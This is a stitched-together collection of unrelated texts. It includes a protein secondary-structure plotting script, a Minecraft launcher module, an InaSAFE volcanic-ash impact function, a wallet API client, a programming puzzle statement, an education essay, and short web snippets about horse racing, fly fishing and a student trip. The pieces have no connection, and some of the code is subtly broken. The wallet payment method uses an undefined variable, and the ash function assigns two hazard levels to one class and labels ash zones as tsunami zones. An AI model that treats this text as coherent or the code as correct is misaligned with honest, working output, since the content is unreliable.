# struct_file = '../Data/color_fasta.txt' + "_struct_data.pik"
# with open(struct_file, 'rb') as f:
# structures, sequences = pickle.load(f)
#
# new_file = '../Data/color_fasta.txt' + "_seqs_data.pik"
# with open(new_file, 'rb') as f:
# sequences_2,seqids,names,descriptions = pickle.load(f)
#
# good_seqids=['1bfp','3ekh','3ned','4k3g','3cfc',
# '1xkh','2wht','4w6b','4xvp','3dqh',
# '1bgp','4q7t','4qgw','5h88','4l1s',
# '5h89','3s0f','4q9w','3rwt','5hzo']
#
# s2D_accuracies = {}
# s2D_accuracy = 0
#
# j=-1
#
# s2D_predictions = []
# for seqid in seqids:
# j+=1
# if seqid in good_seqids:
# struct = structures[j]
# i=0
# prediction = []
# for line in open('../Data/S2D/'+seqid + '_s2d_out.txt'):
# if line[0]!='>' and line[0]!='#':
# if i<11:
# pred = line[40]
# elif i<101:
# pred= line[41]
# else:
# pred = line[42]
# if pred=='H':
# prediction+=[1]
# elif pred=='E':
# prediction+=[-1]
# else:
# prediction+=[0]
# i+=1
# print(seqid)
# x = range(len(prediction))
# beta = []
# alpha = []
# coil = []
# for amino in prediction:
# if amino == -1:
# beta += [1]
# alpha += [0]
# coil += [0]
# elif amino == 1:
# beta += [0]
# alpha += [1]
# coil += [0]
# else:
# beta += [0]
# alpha += [0]
# coil += [1]
# plt.scatter(x,beta,label='beta',marker = 'o',color='blue')
# plt.scatter(x,coil,label='coil',marker='x', color='green')
# plt.scatter(x,alpha,label='alpha',color='red')
# plt.title('Secondary structure prediction s2D '+seqid)
# plt.xlabel('Amino acid position')
# plt.ylabel('Probability')
# lgd = plt.legend(bbox_to_anchor=(1.05, 1), loc=2)
# ax=plt.gca()
# fig = plt.gcf()
# fig.set_size_inches
# ax.set_xlim([0,len(prediction)])
# ax.set_ylim([0.9,1.1])
# plt.savefig('../Data/S2D/'+seqid+'_actual.png',bbox_extra_artists=(lgd,),dpi=600,bbox_inches='tight')
# plt.close()
# s2D_predictions+=[[beta,coil,alpha]]
# struct=struct[:len(prediction)]
# acc=(np.array(prediction)==np.array(struct)).sum()/len(prediction)
# s2D_accuracy+=acc
# s2D_accuracies[seqid]=acc
#
# s2D_accuracy=s2D_accuracy/len(good_seqids)
# print("accuracy s2D: "+str(s2D_accuracy))
#
#
# SOPM_accuracies = {}
# SOPM_accuracy = 0
#
# j=-1
#
# SOPM_predictions=[]
# for seqid in seqids:
# j+=1
# if seqid in good_seqids:
# struct = structures[j]
# prediction = []
# for line in open('../Data/SOPM/'+seqid + '.sopm.txt'):
# if line[0]in ['H','C','E'] and len(prediction)<len(struct):
# pred = line[0]
# if pred=='H':
# prediction+=[1]
# elif pred=='E':
# prediction+=[-1]
# else:
# prediction+=[0]
# print(seqid)
#
# x = range(len(prediction))
# beta = []
# alpha = []
# coil = []
# for amino in prediction:
# if amino == -1:
# beta += [1]
# alpha += [0]
# coil += [0]
# elif amino == 1:
# beta += [0]
# alpha += [1]
# coil += [0]
# else:
# beta += [0]
# alpha += [0]
# coil += [1]
# plt.scatter(x,beta,label='beta',marker = 'o',color='blue')
# plt.scatter(x,coil,label='coil',marker='x', color='green')
# plt.scatter(x,alpha,label='alpha',color='red')
# plt.title('Secondary structure prediction SOPM '+seqid)
# plt.xlabel('Amino acid position')
# plt.ylabel('Probability')
# lgd = plt.legend(bbox_to_anchor=(1.05, 1), loc=2)
# ax=plt.gca()
# fig = plt.gcf()
# fig.set_size_inches
# ax.set_xlim([0,len(prediction)])
# ax.set_ylim([0.9,1.1])
# plt.savefig('../Data/SOPM/'+seqid+'_actual.png',bbox_extra_artists=(lgd,),dpi=600,bbox_inches='tight')
# plt.close()
#
# SOPM_predictions+=[[beta,coil,alpha]]
# struct=struct[:len(prediction)]
# acc=(np.array(prediction)==np.array(struct)).sum()/len(prediction)
# SOPM_accuracy+=acc
# SOPM_accuracies[seqid]=acc
#
# SOPM_accuracy=SOPM_accuracy/len(good_seqids)
# print("accuracy SOPM: "+str(SOPM_accuracy))
# GOR4_accuracies = {}
# GOR4_accuracy = 0
#
# j=-1
#
# GOR4_predictions = []
# for seqid in seqids:
# j+=1
# if seqid in good_seqids:
# struct = structures[j]
# prediction = []
# for line in open('../Data/GORIV/'+seqid + '.gor4.mpsa.txt'):
# if line[0]in ['H','C','E'] and len(prediction)<len(struct):
# pred = line[0]
# if pred=='H':
# prediction+=[1]
# elif pred=='E':
# prediction+=[-1]
# else:
# prediction+=[0]
# print(seqid)
#
# x = range(len(prediction))
# beta = []
# alpha = []
# coil = []
# for amino in prediction:
# if amino == -1:
# beta += [1]
# alpha += [0]
# coil += [0]
# elif amino == 1:
# beta += [0]
# alpha += [1]
# coil += [0]
# else:
# beta += [0]
# alpha += [0]
# coil += [1]
# plt.scatter(x,beta,label='beta',marker = 'o',color='blue')
# plt.scatter(x,coil,label='coil',marker='x', color='green')
# plt.scatter(x,alpha,label='alpha',color='red')
# plt.title('Secondary structure prediction GOR4 '+seqid)
# plt.xlabel('Amino acid position')
# plt.ylabel('Probability')
# lgd = plt.legend(bbox_to_anchor=(1.05, 1), loc=2)
# ax=plt.gca()
# fig = plt.gcf()
# fig.set_size_inches
# ax.set_xlim([0,len(prediction)])
# ax.set_ylim([0.9,1.1])
# plt.savefig('../Data/GORIV/'+seqid+'_actual.png',bbox_extra_artists=(lgd,),dpi=600,bbox_inches='tight')
# plt.close()
#
# GOR4_predictions+=[[beta,coil,alpha]]
# struct=struct[:len(prediction)]
# acc=(np.array(prediction)==np.array(struct)).sum()/len(prediction)
# GOR4_accuracy+=acc
# GOR4_accuracies[seqid]=acc
#
# GOR4_accuracy=GOR4_accuracy/len(good_seqids)
# print("accuracy GORIV: "+str(GOR4_accuracy))
#
#
# data_file = '../Data/color_fasta.txt' + "_data.pik"
# with open(data_file, 'rb') as f:
# data = pickle.load(f)
#
# np.random.shuffle(data)
#
# data_test, data_train = data[:len(data)/4,:], data[len(data)/4:,:]
#
# x_train = data_train[:,1:]
# y_train = data_train[:,:1]
# x_test = data_test[:,1:]
# y_test = data_test[:,:1]
#
#
# logreg = linear_model.LogisticRegression(C=3.4)
# logreg.fit(x_train,y_train)
# data_file = '../Data/color_fasta.txt' + "_data.pik"
# with open(data_file, 'rb') as f:
# data_full = pickle.load(f)
#
# x_full = data_full[:,1:]
# y_full = data_full[:,:1]
# result_full = logreg.predict(x_full)
#
#
#==============================================================================
j=-1
i=0
k=-1
for seqid in seqids:
j+=1
if seqid in good_seqids:
k+=1
x = range(len(structures[j]))
beta_real =[]
alpha_real = []
coil_real = []
for amino in structures[j]:
if amino == -1:
beta_real += [1]
alpha_real += [0]
coil_real += [0]
elif amino == 1:
beta_real += [0]
alpha_real += [1]
coil_real += [0]
else:
beta_real += [0]
alpha_real += [0]
coil_real += [1]
plt.scatter(x,beta_real,label='beta_real',marker = 'o',color='blue')
plt.scatter(x,coil_real,label='coil_real',marker='x', color='green')
plt.scatter(x,alpha_real,label='alpha_real',color='red')
log_ = result_full[i:i+len(sequences[j])]
beta_log =[]
alpha_log = []
coil_log = []
for amino in log_:
if amino == -1:
beta_log += [0.9]
alpha_log += [0]
coil_log += [0]
elif amino == 1:
beta_log += [0]
alpha_log += [0.9]
coil_log += [0]
else:
beta_log += [0]
alpha_log += [0]
coil_log += [0.9]
plt.scatter(x,beta_log,label='beta_log',marker = 'o',color='blue')
plt.scatter(x,coil_log,label='coil_log',marker='x', color='green')
plt.scatter(x,alpha_log,label='alpha_log',color='red')
GOR4 = np.array(GOR4_predictions[k])*0.8
x = range(len(GOR4[0]))
plt.scatter(x,GOR4[0],label='beta_GOR4',marker = 'o',color='blue')
plt.scatter(x,GOR4[1],label='coil_GOR4',marker='x', color='green')
plt.scatter(x,GOR4[2],label='alpha_GOR4',color='red')
SOPM = np.array(SOPM_predictions[k])*0.7
x = range(len(SOPM[0]))
plt.scatter(x,SOPM[0],label='beta_SOPM',marker = 'o',color='blue')
plt.scatter(x,SOPM[1],label='coil_SOPM',marker='x', color='green')
plt.scatter(x,SOPM[2],label='alpha_SOPM',color='red')
s2D = np.array(s2D_predictions[k])*0.6
x = range(len(s2D[0]))
plt.scatter(x,s2D[0],label='beta_s2D',marker = 'o',color='blue')
plt.scatter(x,s2D[1],label='coil_s2D',marker='x', color='green')
plt.scatter(x,s2D[2],label='alpha_s2D',color='red')
plt.title('Secondary structure prediction '+seqid)
plt.xlabel('Amino acid position')
plt.ylabel('Probability')
lgd = plt.legend(bbox_to_anchor=(1.05, 1), loc=2)
ax=plt.gca()
fig = plt.gcf()
fig.set_size_inches
ax.set_xlim([0,len(x)])
ax.set_ylim([0.5,1.1])
plt.savefig('../Data/'+seqid+'.png',bbox_extra_artists=(lgd,),dpi=600,bbox_inches='tight')
plt.close()
i+=len(sequences[j])
|
Hint: Below you can find a summary of the last 5 active years of Uto Blotaie in a grid format. Underneath the chart you can also find more details of the races the horse raced in. A link is also provided to the official race result published by the Malta Racing Club. |
from string import Template
from collections import namedtuple
from ..LibItem import make_comp_items
from ..system import Rule, getStartCodeTemplate, NATIVEKEY
ORDLIBFORM = "{0}/{1}/{2}/{1}-{2}.jar"
NATIVELIBFORM = "{0}/{1}/{2}/{1}-{2}-{3}.jar"
class MCPromotNormal:
'''promotion to minecraft 1.12.2 and earlier.'''
def __init__(self, version):
self.version = version
@property
def version(self):
return self._version
@version.setter
def version(self, version):
self._version = version
def initLibs(self, lib_data, conf, include_native=False):
return make_comp_items(lib_data, conf=conf, include_native=include_native)
def initMcArgs(self, args_data):
return Template(args_data)
def initStartCode(self):
return Template(getStartCodeTemplate())
class MCPromotForge(MCPromotNormal):
def __init__(self, version):
super(MCPromotForge, self).__init__(version)
#sign:change it into the form which is the same as initlib
def initForgeLibs(self, forge_lib_data):
forge_list = []
for forge_lib in forge_lib_data:
package, name, version = forge_lib["name"].split(':')
ord_forge_lib = ORDLIBFORM.format(package.replace('.', '/'), name, version)
forge_list.append(ord_forge_lib)
return forge_list
def initMcArgs(self, args_data):
return Template(args_data) |
It’s been a while since I’ve posted, but gee things get busy when steelhead run into town. Here is a great pattern tied by Syd Glasso found on the Rare and Unusual (http://www.rareandunusual.com) pattern listing. It’s defiantly a site to book mark for all of the great patterns and history found inside. It’s been a while since the page was updated, but hopefully it sticks around. |
# coding=utf-8
"""InaSAFE Disaster risk tool by Australian Aid - Tsunami Raster Impact on
Buildings
Contact : [email protected]
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
import logging
from safe.impact_functions.ash.ash_raster_places.metadata_definitions import \
AshRasterHazardPlacesFunctionMetadata
from safe.impact_functions.bases.continuous_rh_classified_ve import \
ContinuousRHClassifiedVE
from safe.storage.vector import Vector
from safe.common.exceptions import KeywordNotFoundError
from safe.utilities.i18n import tr
from safe.utilities.utilities import main_type
from safe.engine.interpolation import assign_hazard_values_to_exposure_data
from safe.impact_reports.place_exposure_report_mixin import (
PlaceExposureReportMixin)
__author__ = 'etienne'
__project_name__ = 'inasafe-dev'
__filename__ = 'impact_function.py'
__date__ = '7/13/16'
__copyright__ = '[email protected]'
LOGGER = logging.getLogger('InaSAFE')
class AshRasterPlaceFunction(
ContinuousRHClassifiedVE,
PlaceExposureReportMixin):
# noinspection PyUnresolvedReferences
"""Inundation raster impact on building data."""
_metadata = AshRasterHazardPlacesFunctionMetadata()
def __init__(self):
"""Constructor (calls ctor of base class)."""
super(AshRasterPlaceFunction, self).__init__()
PlaceExposureReportMixin.__init__(self)
self.hazard_classes = [
tr('Very Low'),
tr('Low'),
tr('Moderate'),
tr('High'),
tr('Very High'),
]
self.no_data_warning = False
def notes(self):
"""Return the notes section of the report.
:return: The notes that should be attached to this impact report.
:rtype: list
"""
# Range for ash hazard
group_parameters = self.parameters['group_threshold']
unaffected_max = group_parameters.value_map[
'unaffected_threshold']
very_low_max = group_parameters.value_map['very_low_threshold']
low_max = group_parameters.value_map['low_threshold']
medium_max = group_parameters.value_map['moderate_threshold']
high_max = group_parameters.value_map['high_threshold']
fields = [
tr('Dry zone is defined as non-inundated area or has inundation '
'depth is 0 %s') % low_max.unit.abbreviation,
tr('Very Low ash hazard zone is defined as ash depth is '
'more than %s %s but less than %.1f %s') % (
unaffected_max,
unaffected_max.unit.abbreviation,
very_low_max.value,
very_low_max.unit.abbreviation),
tr('Low ash hazard zone is defined as ash depth is '
'more than %s %s but less than %.1f %s') % (
very_low_max,
very_low_max.unit.abbreviation,
low_max.value,
low_max.unit.abbreviation),
tr('Medium tsunami hazard zone is defined as ash depth '
'is more than %.1f %s but less than %.1f %s') % (
low_max.value,
low_max.unit.abbreviation,
medium_max.value,
medium_max.unit.abbreviation),
tr('High tsunami hazard zone is defined as ash depth is '
'more than %.1f %s but less than %.1f %s') % (
medium_max.value,
medium_max.unit.abbreviation,
high_max.value,
high_max.unit.abbreviation),
tr('Very high tsunami hazard zone is defined as ash depth '
'is more than %.1f %s') % (
high_max.value, high_max.unit.abbreviation)
]
# include any generic exposure specific notes from definitions.py
fields = fields + self.exposure_notes()
# include any generic hazard specific notes from definitions.py
fields = fields + self.hazard_notes()
return fields
def run(self):
"""Tsunami raster impact to buildings (e.g. from Open Street Map)."""
# Range for ash hazard
group_parameters = self.parameters['group_threshold']
unaffected_max = group_parameters.value_map[
'unaffected_threshold'].value
very_low_max = group_parameters.value_map['very_low_threshold'].value
low_max = group_parameters.value_map['low_threshold'].value
medium_max = group_parameters.value_map['moderate_threshold'].value
high_max = group_parameters.value_map['high_threshold'].value
# Interpolate hazard level to building locations
interpolated_layer = assign_hazard_values_to_exposure_data(
self.hazard.layer,
self.exposure.layer,
attribute_name=self.target_field)
# Extract relevant exposure data
features = interpolated_layer.get_data()
total_features = len(interpolated_layer)
try:
population_field = self.exposure.keyword('population_field')
except KeywordNotFoundError:
population_field = None
# required for real time
self.exposure.keyword('name_field')
structure_class_field = self.exposure.keyword('structure_class_field')
exposure_value_mapping = self.exposure.keyword('value_mapping')
self.init_report_var(self.hazard_classes)
for i in range(total_features):
# Get the interpolated depth
ash_hazard_zone = float(features[i][self.target_field])
if ash_hazard_zone <= unaffected_max:
current_hash_zone = 0 # not affected
elif unaffected_max < ash_hazard_zone <= very_low_max:
current_hash_zone = 1 # very low
elif very_low_max < ash_hazard_zone <= low_max:
current_hash_zone = 2 # low
elif low_max < ash_hazard_zone <= medium_max:
current_hash_zone = 2 # medium
elif medium_max < ash_hazard_zone <= high_max:
current_hash_zone = 3 # high
elif high_max < ash_hazard_zone:
current_hash_zone = 4 # very high
# If not a number or a value beside real number.
else:
current_hash_zone = 0
usage = features[i].get(structure_class_field, None)
usage = main_type(usage, exposure_value_mapping)
# Add calculated impact to existing attributes
features[i][self.target_field] = current_hash_zone
category = self.hazard_classes[current_hash_zone]
if population_field is not None:
population = float(features[i][population_field])
else:
population = 1
self.classify_feature(category, usage, population, True)
self.reorder_dictionaries()
style_classes = [
dict(
label=self.hazard_classes[0] + ': >%.1f - %.1f cm' % (
unaffected_max, very_low_max),
value=0,
colour='#00FF00',
transparency=0,
size=1
),
dict(
label=self.hazard_classes[1] + ': >%.1f - %.1f cm' % (
very_low_max, low_max),
value=1,
colour='#FFFF00',
transparency=0,
size=1
),
dict(
label=self.hazard_classes[2] + ': >%.1f - %.1f cm' % (
low_max, medium_max),
value=2,
colour='#FFB700',
transparency=0,
size=1
),
dict(
label=self.hazard_classes[3] + ': >%.1f - %.1f cm' % (
medium_max, high_max),
value=3,
colour='#FF6F00',
transparency=0,
size=1
),
dict(
label=self.hazard_classes[4] + ': <%.1f cm' % high_max,
value=4,
colour='#FF0000',
transparency=0,
size=1
),
]
style_info = dict(
target_field=self.target_field,
style_classes=style_classes,
style_type='categorizedSymbol')
impact_data = self.generate_data()
extra_keywords = {
'target_field': self.target_field,
'map_title': self.metadata().key('map_title'),
'legend_title': self.metadata().key('legend_title'),
'legend_units': self.metadata().key('legend_units'),
}
impact_layer_keywords = self.generate_impact_keywords(extra_keywords)
impact_layer = Vector(
data=features,
projection=interpolated_layer.get_projection(),
geometry=interpolated_layer.get_geometry(),
name=self.metadata().key('layer_name'),
keywords=impact_layer_keywords,
style_info=style_info)
impact_layer.impact_data = impact_data
self._impact = impact_layer
return impact_layer
|
Devu and his friend Amit got selected in a random television reality show. One of the task in the show was really interesting. The task was called "the survival" task. In the task, each person has to vote two person's names. One should not vote a single person twice. Also he/ she should not vote himself/ herself. After the voting, all the person having votes equal to highest and lowest votes are kicked out of the show. Naturally highest voted persons should go out of the show, but to maintain interestingness of the show, they also kick out lowest voted persons too.
Devu and Amit naturally don't want themselves to get kicked out of the show. Fortunately, voting of all other persons than Devu and Amit has already happened, so now Devu and Amit know choices of votes of all other persons. Assume that there are total n persons. You are guaranteed that n is greater than or equal to 3. Devu has index n - 1 and Amit has index n. The votes of all other persons that Devu and Amit are given to you by two arrays firstVote and secondVote each of size n - 2. Now Devu and Amit both want to design a strategy of voting after having discussion with each other. They want that as few of them (i.e. from Devu and Amit) gets out of the show. You have to tell in the best scenario, will both, one or none of them will remain in the show? Print a single line containing "both", "one" or "none" according to the situation. You also have to tell details of whom Devu and Amit will vote? If there are more than possible ways they can vote, print any of them.
First line of the test case will contain a single integer n denoting total number of persons in the show.
Second line contains n - 2 space separated integers denoting the array firstVote, denoting the first votes of all other persons than Devu and Amit.
Third line contains n - 2 space separated integers denoting the array secondVote denoting the second votes of all other persons than Devu and Amit.
For each test case, print three lines.
Second line should contain two space separated integers corresponding to the votes of Devu.
Third line should contain two space separated integers corresponding to the votes of Amit.
Example case 1. There is exactly one way of voting for Devu and Amit. So after the voting, all the persons will have equal votes. So they all will be kicked out of the show. So as Devu and Amit both are kicked out, print "none" in first line. In second line, print votes of Devu(index 2) and in third line print votes of Amit. |
import requests
import time
import hashlib
import hmac
import logging
import json
from random import randint
from base64 import b64decode
from django.conf import settings
from django.forms import ValidationError
class ChipChapAuthError(Exception):
def __init__(self, message, errors):
super(ChipChapAuthError, self).__init__(message)
self.errors = errors
class ChipChapAuthConnection(object):
def __init__(self):
self.logger = self.init_logger()
if 'client_id' in settings.MULTICURRENCY:
self.able_to_connect = True
cdata = settings.MULTICURRENCY
self.client_id = cdata['client_id']
self.client_secret = cdata['client_secret']
self.access_key = cdata['access_key']
self.access_secret = cdata['access_secret']
self.url_new_user = cdata['url_new_user']
self.url_client = cdata['url_client']
self.url_history = cdata['url_history']
self.url_balance = cdata['url_balance']
if not hasattr(cdata, 'ocp_api_key'):
self.ocp_api_key = None
#raise ValidationError("Is needed the API key given by BotC wallet to this platform (settings).")
print("WARN: Multiwallet Read-Only! To make payments is needed the API key given by OCP to the BotC wallet platform (in local_settings).")
self.logger.error("WARN: Multiwallet Read-Only! To make payments is needed the API key given by OCP to the BotC wallet platform (in local_settings).")
else:
self.ocp_api_key = cdata['ocp_api_key']
self.logger.info("Connected with an OCP api-key for safe access.")
if not hasattr(cdata, "url_w2w"):
self.url_w2w = None
print("WARN: Multiwallet without W2W permissions! Can't let users pay the shares...")
self.logger.error("WARN: Multiwallet without W2W permissions! Can't let users pay the shares...")
else:
self.url_w2w = cdata['url_w2w']
if not "url_ticker" in cdata:
self.url_ticker = None
print("WARN: Multicurrency without Ticker! Can't process crypto prices (except faircoin)")
self.logger.error("WARN: Multicurrency without Ticker! Can't process crypto prices (except faircoin)")
else:
self.url_ticker = cdata['url_ticker']
#if not "url_tx_json" in cdata:
# self.url_tx_json = None
# print("WARN: Multicurrency without url_tx_json! Can't check crypto payments")
# self.logger.error("WARN: Multicurrency without url_tx_json! Can't check crypto payments")
#else:
# self.url_tx_json = cdata['url_tx_json']
self.url_fair_tx = cdata['url_fair_tx']
else:
self.able_to_connect = False
self.logger.critical("Invalid configuration data to connect.")
@classmethod
def get(cls):
return cls()
@classmethod
def init_logger(cls):
logger = logging.getLogger("multicurrency")
logger.setLevel(logging.WARNING)
if 'log_file' in settings.MULTICURRENCY:
fhpath = settings.MULTICURRENCY["log_file"]
else:
fhpath = "/".join(
[settings.PROJECT_ROOT, "multicurrency.log", ])
fh = logging.handlers.TimedRotatingFileHandler(
fhpath, when="d", interval=1, backupCount=7)
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'%(asctime)s - %(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
fh.setFormatter(formatter)
logger.addHandler(fh)
return logger
@classmethod
def chipchap_x_signature(cls, access_key, access_secret):
if len(access_secret) % 4:
access_secret += '=' * (4 - len(access_secret) % 4)
nonce = str(randint(0, 100000000))
timestamp = str(int(time.time()))
string_to_sign = access_key + nonce + timestamp
signature = hmac.new(
b64decode(access_secret),
bytes(str(string_to_sign).encode("utf-8")),
hashlib.sha256).hexdigest()
headers = {
'X-Signature': 'Signature access-key="' + access_key +
'", nonce="' + nonce + '", timestamp="' + timestamp +
'", version="2", signature="' + signature + '"'}
return headers
def new_chipchap_user(self, username, email, company_name, password,
repassword):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
headers = ChipChapAuthConnection.chipchap_x_signature(
self.access_key, self.access_secret)
data = {
'username': username,
'email': email,
'company_name': company_name,
'password': password,
'repassword': repassword,
}
response = requests.post(self.url_new_user, headers=headers, data=data)
if int(response.status_code) == 201:
self.logger.info("New chipchap user request for " + username
+ " has been succesfully processed.")
return response.json()
else:
msg = response.json()
self.logger.critical(
"New chipchap user request for " + username + " has returned "
+ str(response.status_code) + " status code. Error: "
+ response.text)
raise ChipChapAuthError(
'Error ' + str(response.status_code)
+ ': ' + msg['message'], response.text)
def new_client(self, username, password):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
headers = ChipChapAuthConnection.chipchap_x_signature(
self.access_key, self.access_secret)
data = {
'client_id': self.client_id,
'client_secret': self.client_secret,
'username': username,
'password': password,
}
response = requests.post(self.url_client, headers=headers, data=data)
if int(response.status_code) == 200:
return response.json()
else:
self.logger.critical(
"Authentication request for " + username + " has returned "
+ str(response.status_code) + " status code. Error: "
+ response.text)
raise ChipChapAuthError(
'Error ' + str(response.status_code), response.text)
def wallet_history(self, access_key, access_secret, limit=10, offset=0):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
headers = ChipChapAuthConnection.chipchap_x_signature(
access_key, access_secret)
params = {
"limit": limit,
"offset": offset,
}
tx_list = requests.get(
self.url_history, headers=headers, params=params)
balance = requests.get(self.url_balance, headers=headers)
if int(tx_list.status_code) == 200 and int(balance.status_code) == 200:
return tx_list.json(), balance.json()
else:
error = str(balance.status_code) + ' and ' + str(
tx_list.status_code)
msg = balance.text + ' and ' + tx_list.text
self.logger.critical("Balance and history requests have returned "
+ error + " status codes. Error: " + msg)
raise ChipChapAuthError('Error ' + error, msg)
def wallet_balance(self, access_key, access_secret):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
headers = ChipChapAuthConnection.chipchap_x_signature(
access_key, access_secret)
balance = requests.get(self.url_balance, headers=headers)
if int(balance.status_code) == 200:
return balance.json()
else:
error = str(balance.status_code)
msg = balance.text
self.logger.critical("Balance request have returned "
+ error + " status code. Error: " + msg)
raise ChipChapAuthError('Error ' + error, msg)
def send_w2w(self, access_key, access_secret, unit, amount, username, scale):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
headers = ChipChapAuthConnection.chipchap_x_signature(
access_key, access_secret)
payment = requests.get(self.url_w2w+(unit), headers=headers, params=params)
if int(payment.status_code) == 200:
return payment.json()
else:
error = str(payment.status_code)
msg = payment.text
self.logger.critical("Payment w2w request have returned "
+ error + " status code. Error: " + msg)
raise ChipChapAuthError('Error ' + error, msg)
def check_payment(self, access_key, access_secret, unit, txid):
if not self.able_to_connect:
raise ChipChapAuthError('Connection Error', 'No data to connect')
mtx = None
txlist, balance = self.wallet_history(access_key, access_secret, 20)
if txlist:
status = txlist['status']
if status == 'ok':
for tx in txlist['data']['elements']:
if tx['id'] == txid:
mtx = tx
if not mtx:
print("Can't find the mtxid in last 20, search olders??")
self.logger.info("Can't find the mtxid in last 20, search olders??")
if not mtx:
txlist, balance = self.wallet_history(access_key, access_secret, 200)
if txlist:
status = txlist['status']
if status == 'ok':
for tx in txlist['data']['elements']:
if tx['id'] == txid:
mtx = tx
if not mtx:
print("Can't find the mtxid in last 200, search olders??")
self.logger.info("Can't find the mtxid in last 200, search olders??")
return mtx, status
"""
headers = ChipChapAuthConnection.chipchap_x_signature(
access_key, access_secret)
if unit == 'fair':
unit = 'fac'
url = self.url_multi_txs # self.url_fair_tx+txid
else:
url = self.url_tx_json+(unit)+'/'+txid
params = {
'currency': unit,
'id': txid,
}
paycheck = requests.get(
url,
headers=headers)
#params=params)
print("URL: "+str(url))
#print("Headers: "+str(headers))
if int(paycheck.status_code) == 200:
self.logger.debug('Response (200) json:'+str(paycheck.json()))
print('Response (200) json:'+str(paycheck.json()))
return None, paycheck.json() # TODO
else:
error = str(paycheck.status_code)
#msg = paycheck.json()['message'] #json.loads(paycheck.text)
msg = paycheck.text
self.logger.error("Payment check request have returned "+error+" status code. Error: "+msg)
print("Payment check request have returned "+error+" status code. Error: "+msg)
return None, msg
#raise ChipChapAuthError('Error '+error, msg['message'])
"""
|
In 1983 Howard Gardner, a psychologist and professor, developed a theory of multiple intelligences from which every individual pulls from to make up their own individual self. He proposes that each of these intelligences can be enhanced with practice regardless of age, but "intelligences" are generally set by the time a child reaches adolescences (Sadowski, 2008). Gardner's multiple intelligences should not be confused with an individual's learning styles, though it seems as though Gardner as taken the three basic learning styles and expanded upon them. Below are lists of both for one to differentiate between the two theories.
Visual- learning by seeing and looking- executive positions where a vision of the future is important, architects, engineers, and surgeons.
Kinesthetic- learn by touching and doing- dancing, acting, construction, or athletics.
As educators of adolescents we have to work with the hand that is dealt us. We have to be open to the multiple intelligences of our students. We should aim to teach to each of these intelligences equally. This does not mean that we have to teach to each intelligence in every single lesson, but rather implement as many ways of learning as possible so that we reach as many students as we can in any given lesson.
Figuring out a variety of ways to present a lesson also helps us, as teachers, to better understand the content that we are delivering to our students (Sadowski, 2008). We develop a deeper understanding as we look to explain materials in a variety of ways in our lessons. We are supposed to be experts in our fields of instruction so that we can effectively pass on knowledge to a younger generation, and what better way to become an expert than to explore as many facets of the content we plan to deliver as we possibly can.
Howard Gardner touches on his theory of multiple intelligences and explains the importance of shifting from a teacher-centered education to one where the students are at the center of learning. In this type of classroom students are able to learn the same content, but through different modes of learning. This type of differentiation is a way of teaching to the multiple intelligences of our students.
Gardner, H. (1999). Intelligence reframed. NY, New York: Basic books.
Sadowski, M. (2008). Adolescents at school. Harvard education press: Cambridge, MA. |
#
#
# Copyright 2016 Tom Deakin, University of Bristol
#
# This file is part of mega-stream.
#
# mega-stream is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# mega-stream is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with mega-stream. If not, see <http://www.gnu.org/licenses/>.
#
#
# This aims to investigate the limiting factor for a simple kernel, in particular
# where bandwidth limits not to be reached, and latency becomes a dominating factor.
#
#
import numpy
import matplotlib.pyplot as plt
data = numpy.zeros((8,5))
data[0] = [71103.0, 114238.5, 94292.4, 92105.7, 52930.6]
data[1] = [147649.4, 223801.5, 251318.1, 227114.9, 196121.0]
data[2] = [252762.3, 311192.7, 294210.3, 227833.1, 185339.1]
data[3] = [310676.5, 395393.0, 302705.0, 195018.7, 0.0]
data[4] = [351479.6, 332399.7, 241249.2, 183720.3, 0.0]
data[5] = [439309.4, 294268.8, 191220.3, 168287.6, 0.0]
data[6] = [411714.6, 212903.5, 167718.5, 0.0, 0.0]
data[7] = [270262.7, 181380.7, 145228.9, 0.0, 0.0]
data *= 1.0E-3
fig, ax = plt.subplots()
plt.pcolor(data, cmap='GnBu')
ax.set_xticks(numpy.arange(data.shape[1]) + 0.5)
ax.set_yticks(numpy.arange(data.shape[0]) + 0.5)
ax.set_xticklabels([4, 8, 16, 32, 64])
ax.set_yticklabels([8, 16, 32, 64, 128, 256, 512, 1024])
ax.set_xlabel('Middle size')
ax.set_ylabel('Inner size')
plt.title('Outer size=64')
cbr = plt.colorbar()
cbr.ax.set_ylabel('Bandwidth GB/s')
# Add data labels
for i in range(data.shape[1]):
for j in range(data.shape[0]):
if (data[j][i] != 0.0):
plt.text(i + 0.5, j + 0.5, '%.1f' % (data[j][i]),
ha='center', va='center',
size='small', color='black', weight='bold')
else:
plt.text(i + 0.5, j + 0.5, '-',
ha='center', va='center',
size='small', color='black', weight='bold')
#fig.set_tight_layout(True)
plt.savefig('heatmap.pdf')
|
Thinkdam is the only student Amsterdam trip that exclusively brings together thinkers.
Debate teams alongside philosophers, conservatives alongside socialists.
As part of Thinkdam we run a series of small events all over the city, and in a variety of locations. Discuss moral philosophy in a coffeeshop, debate the death penalty in a coffee shop (coffeeshop and coffee shop are different, trust us), or discuss the benefits of capitalism in a Brown Cafe (the Dutch traditional pub).
All the events are included in your ticket, so you can choose as many of the events you are interested in.
Karl Marx or Adam Smith?
As the home of huge businesses but also one of the strongest safety nets in Europe, Amsterdam might be a utopian middle ground for the more politically motivated. Or maybe you disagree... We're running small discussion events so you can solve politics once and for all.
All events are included in your ticket. Feel free to join and watch, or to debate.
Thinkdam brings you together with the brightest minds, and presents the most interesting thoughts. You will have opportunities to meet new people on our executive coaches, at our awesome hostel, or on one of our many events.
